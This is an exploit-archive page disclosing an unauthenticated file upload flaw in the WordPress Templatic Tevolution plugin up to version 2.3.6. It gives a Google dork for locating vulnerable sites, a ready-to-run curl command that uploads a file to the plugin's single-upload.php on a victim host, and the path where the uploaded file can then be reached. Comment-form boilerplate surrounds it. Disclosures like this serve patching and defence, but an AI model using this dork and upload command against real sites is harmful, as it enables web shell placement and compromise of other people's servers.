WordPress Templatic 2.3.6 File Upload

2016.12.31

Credit: r3m1ck

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

Dork: inurl:"wp-content/plugins/Tevolution/"

# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016
# Software Link: Permium plugin
# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
# Exploit Author: r3m1ck
# Website: https://www.r3m1ck.us/
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"
1. Description
Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.
2. Proof of Concept
curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
3. Uploaded file location:
Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
ex:
http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Templatic 2.3.6 File Upload

Dork: inurl:"wp-content/plugins/Tevolution/"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.